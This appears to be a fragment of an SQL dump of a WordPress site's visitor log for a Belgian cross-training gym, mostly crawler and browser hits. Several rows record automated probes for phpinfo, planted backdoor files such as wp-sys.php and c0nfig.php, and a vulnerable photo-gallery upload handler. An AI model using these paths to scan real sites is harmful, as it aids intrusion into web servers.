(70041, 1492620379.838965, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70042, 1492620380.265927, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70043, 1492620380.722317, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70044, 1492620381.122553, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70045, 1492620381.509665, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70046, 1492620381.960187, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1'),
(70047, 1492620382.414692, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70048, 1492620382.822722, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70049, 1492620383.232326, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70050, 1492620383.685267, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70051, 1492620384.089701, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70052, 1492620384.562935, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70053, 1492622060.716161, 2903041570, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/?phpinfo=1', 'crosstrainingcenter.be', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.75 Safari/537.36'),
(70054, 1492622234.642563, 533943821, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/wp-sys/wp-sys.php', 'crosstrainingcenter.be', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.75 Safari/537.36'),
(70055, 1492622787.768421, 533943821, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/wp-sys/wp-sys.php', 'crosstrainingcenter.be', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.75 Safari/537.36'),
(70056, 1492622910.922195, 533943821, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/http.php', 'crosstrainingcenter.be', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.75 Safari/537.36'),
(70057, 1492622954.488329, 533943821, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-includes/pomo/wp-sys.php', 'crosstrainingcenter.be', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.75 Safari/537.36'),
(70058, 1492623094.577496, 1503912874, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-admin/css/uploader.php', 'crosstrainingcenter.be', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.75 Safari/537.36'),
(70059, 1492623096.635118, 1503912874, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/uploader.php', 'crosstrainingcenter.be', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.75 Safari/537.36'),
(70060, 1492631701.818004, 1123632454, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(70061, 1492635928.337834, 1123632436, 0, 0, 1, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(70062, 1492635929.756417, 1123632454, 0, 0, 1, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(70063, 1492641838.409806, 2366158614, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(70064, 1492642731.832657, 2297635928, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(70065, 1492642732.255144, 2297635928, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(70066, 1492642743.029429, 2297635928, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/sitemap.xml', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(70067, 1492642753.215121, 2297635928, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/sitemap.xml', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(70068, 1492642780.197366, 2297635928, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/comments/feed/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(70069, 1492642789.941402, 2297635928, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/contact/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(70070, 1492642800.842148, 2297635928, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/en-images/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(70071, 1492642816.675277, 2297635928, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/feed/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(70072, 1492643002.111187, 2297635928, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(70073, 1492643002.502892, 2297635928, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(70074, 1492643032.294592, 2297635928, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(70075, 1492643041.907143, 2297635928, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(70076, 1492643134.921195, 2297635928, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(70077, 1492643145.822837, 2297635928, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/266-2/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(70078, 1492643152.658611, 2297635928, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/266-2/feed/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(70079, 1492649722.316017, 1570674729, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(70080, 1492649724.002734, 2996488257, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/prix/', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(70081, 1492653936.149426, 1123632454, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(70082, 1492654180.502247, 3639891306, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/photo-gallery/filemanager/UploadHandler.php', 'http://crosstrainingcenter.be/wp-content/plugins/photo-gallery/filemanager/UploadHandler.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36'),
(70083, 1492655450.213160, 2637637394, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(70084, 1492655450.526305, 2637637394, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(70085, 1492661987.090617, 2366148109, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/uploads/wpcf7_captcha/2054655683.png', '', 'Mozilla/5.0 (compatible; YandexImages/3.0; +http://yandex.com/bots)'),
(70086, 1492662568.619240, 1338304824, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(70087, 1492665376.314081, 872368003, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/comments/feed/', '', 'Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)'),
(70088, 1492669045.500507, 3587418447, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'https://www.google.be/', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),
(70089, 1492669047.105296, 3587418447, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),
(70090, 1492671737.471666, 1796538632, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (compatible; DuckDuckGo-Favicons-Bot/1.0; +http://duckduckgo.com)'),
(70091, 1492671738.055084, 1796538632, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'Mozilla/5.0 (compatible; DuckDuckGo-Favicons-Bot/1.0; +http://duckduckgo.com)'),
(70092, 1492676950.525994, 1538728719, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'https://www.google.be/', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.81 Safari/537.36'),
(70093, 1492676952.481939, 1538728719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.81 Safari/537.36'),
(70094, 1492676974.284030, 1538728719, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/le-cross-training/', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.81 Safari/537.36'),
(70095, 1492676983.185318, 1538728719, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/le-cross-training/', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.81 Safari/537.36'),
(70096, 1492676988.673001, 1538728719, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/contact/', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.81 Safari/537.36'),
(70097, 1492676997.283675, 1538728719, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/en-images/', 'http://www.crosstrainingcenter.be/contact/', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.81 Safari/537.36'),
(70098, 1492676998.892410, 1538728719, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/lequipe/', 'http://www.crosstrainingcenter.be/en-images/', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.81 Safari/537.36'),
(70099, 1492677046.141576, 676177770, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(70100, 1492677342.027243, 676177848, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(70101, 1492677394.240615, 676177777, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/266-2/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(70102, 1492680218.602528, 786801763, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; SemrushBot/1.2~bl; +http://www.semrush.com/bot.html)'),
(70103, 1492681823.360917, 1338304824, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(70104, 1492684089.301101, 676177777, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(70105, 1492684089.779859, 676177777, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(70106, 1492685844.906475, 1044547625, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://crosstrainingcenter.be', 'Go-http-client/1.1'),
(70107, 1492685849.937084, 1044547625, 0, 0, 0, 0, 1, 'https://www.crosstrainingcenter.be/', 'https://crosstrainingcenter.be', 'Go-http-client/1.1'),
(70108, 1492687019.508127, 3168871343, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/config.php', 'http://crosstrainingcenter.be/config.php', 'Opera/9.80 (X11; Linux zbov) Presto/2.11.355 Version/12.10'),
(70109, 1492687020.959350, 3168871343, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/cg-bn/lndex.php', 'http://crosstrainingcenter.be/cg-bn/lndex.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20130406 Firefox/23.0'),
(70110, 1492687032.161114, 3168871343, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/_index.php', 'http://crosstrainingcenter.be/_index.php', 'Mozilla/5.0 (Windows NT 6.1; rv:21.0) Gecko/20100101 Firefox/21.0'),
(70111, 1492687033.350959, 3168871343, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/c0nfig.php', 'http://crosstrainingcenter.be/c0nfig.php', 'Mozilla/5.0 (Windows NT 5.1; rv:23.0) Gecko/20100101 Firefox/23.0'),
(70112, 1492687034.683165, 3168871343, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-demr.php', 'http://crosstrainingcenter.be/wp-demr.php', 'Mozilla/5.0 (Windows NT 6.0) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1'),
(70113, 1492687035.872967, 3168871343, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-acc.php', 'http://crosstrainingcenter.be/wp-acc.php', 'Opera/9.80 (Windows NT 5.1) Presto/2.12.388 Version/12.16'),
(70114, 1492687036.978918, 3168871343, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-syst.php', 'http://crosstrainingcenter.be/wp-syst.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0'),
(70115, 1492691158.743648, 1338304824, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(70116, 1492696640.218960, 1538523603, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'https://www.google.be/', 'Mozilla/5.0 (Linux; Android 6.0.1; SM-G903F Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.132 Mobile Safari/537.36'),
(70117, 1492696658.731119, 1538523603, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'https://www.google.be/', 'Mozilla/5.0 (Linux; Android 6.0.1; SM-G903F Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.132 Mobile Safari/537.36'),
(70118, 1492696660.794774, 1538523603, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (Linux; Android 6.0.1; SM-G903F Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.132 Mobile Safari/537.36'),
(70119, 1492696693.935372, 1538523603, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (Linux; Android 6.0.1; SM-G903F Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.132 Mobile Safari/537.36'),
(70120, 1492696709.318024, 1538523603, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/contact/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Linux; Android 6.0.1; SM-G903F Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.132 Mobile Safari/537.36'),
(70121, 1492696717.064624, 1538523603, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/en-images/', 'http://www.crosstrainingcenter.be/contact/', 'Mozilla/5.0 (Linux; Android 6.0.1; SM-G903F Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.132 Mobile Safari/537.36'),
(70122, 1492696724.182103, 1538523603, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/en-images/', 'Mozilla/5.0 (Linux; Android 6.0.1; SM-G903F Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.132 Mobile Safari/537.36'),
(70123, 1492702135.375851, 3649627714, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.bing.com/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393'),
(70124, 1492702136.076386, 3649627714, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393'),
(70125, 1492702151.743136, 3649627714, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/266-2/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393'),
(70126, 1492702152.710238, 3649627714, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393'),
(70127, 1492703182.359942, 1370047582, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (Linux; Android 6.0.1; SAMSUNG SM-A310F Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/4.0 Chrome/44.0.2403.133 Mobile Safari/537.36'),
(70128, 1492703187.771102, 1370047582, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Linux; Android 6.0.1; SAMSUNG SM-A310F Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/4.0 Chrome/44.0.2403.133 Mobile Safari/537.36'),
(70129, 1492704407.991254, 1837165719, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(70130, 1492704408.522590, 1837165719, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70131, 1492704408.968508, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70132, 1492704409.466578, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70133, 1492704409.928065, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70134, 1492704410.367669, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70135, 1492704410.912174, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70136, 1492704411.350910, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70137, 1492704411.960536, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70138, 1492704412.405504, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70139, 1492704412.835977, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70140, 1492704955.162754, 1338304824, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(70141, 1492706483.188475, 84513669, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; MJ12bot/v1.4.7; http://mj12bot.com/)'),
(70142, 1492706485.079858, 84513669, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/hello-world/feed/', '', 'Mozilla/5.0 (compatible; MJ12bot/v1.4.7; http://mj12bot.com/)'),
(70143, 1492706626.370695, 1837165719, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(70144, 1492706626.961855, 1837165719, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70145, 1492706627.442288, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70146, 1492706627.905019, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70147, 1492706628.353311, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70148, 1492706628.847568, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70149, 1492706629.423805, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70150, 1492706629.865998, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70151, 1492706630.407529, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70152, 1492706630.903820, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70153, 1492706631.412172, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70154, 1492707355.168617, 1123632454, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(70155, 1492707355.631627, 1123632454, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(70156, 1492707485.727704, 1338304824, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/en-images/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
